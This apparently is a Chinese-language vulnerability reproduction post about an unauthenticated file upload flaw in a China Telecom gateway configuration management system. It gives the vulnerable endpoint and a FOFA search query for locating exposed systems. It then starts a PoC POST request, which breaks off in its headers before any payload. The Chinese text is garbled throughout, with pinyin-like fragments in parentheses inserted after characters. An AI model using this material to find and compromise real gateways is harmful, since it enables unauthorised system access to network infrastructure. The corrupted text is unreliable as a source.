0x01 產(chǎn)品簡(jiǎn)介

中國電信集團(tuán)有限公司（英文名稱“China Telecom”、簡(jiǎn)稱“中國電信”）成立于2000年9月，是中國特大型國有通信企業(yè)、上海世博會(huì)全球合作伙伴。電信網(wǎng)關(guān)配置管理系統(tǒng)是一個(gè)用于管理和配置電信網(wǎng)絡(luò)中網(wǎng)關(guān)設(shè)備的軟件系統(tǒng)。它可以幫助網(wǎng)絡(luò)管理員實(shí)現(xiàn)對(duì)網(wǎng)關(guān)設(shè)備的遠(yuǎn)程監(jiān)控、配置、升級(jí)和故障排除等功能，從而確保網(wǎng)絡(luò)的正常運(yùn)行和高效性能。

0x02 漏洞概述

電信網(wǎng)關(guān)配置管理系統(tǒng) /manager/teletext/material/rewrite.php 接口存在文件上傳漏洞，未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者可以利用文件上傳漏洞獲取系統(tǒng)權(quán)限。

0x03 復(fù)現(xiàn)環(huán)境

FOFA：body="img/login_bg3.png" && body="系統(tǒng)登錄"

0x04 漏洞復(fù)現(xiàn)

PoC

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.